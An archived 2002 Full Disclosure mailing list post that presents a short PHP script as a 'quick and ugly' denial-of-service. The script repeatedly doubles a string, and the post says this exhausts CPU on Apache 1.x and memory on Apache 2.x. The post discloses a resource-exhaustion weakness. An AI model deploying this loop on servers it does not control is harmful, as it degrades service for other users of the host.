Full Disclosure mailing list archives
quick and ugly DoS with php
From: rcs () rshell org (Guy Cohen)
Date: Sat, 21 Sep 2002 02:03:48 +0300
the following code will make a system running apache 1.x load avarage
very high in seconds. On a system running apache 2.x the poor httpd
process with take 99% of your memory.
[root@noname apache2]# cat htdocs/test.php
<?
$counter=0;
$string="Hello";
while($counter<100)
{$string=$string.$string;
$counter++;
}
?>
Current thread:
- quick and ugly DoS with php Guy Cohen (Sep 20)
- quick and ugly DoS with php Michal Zalewski (Sep 20)
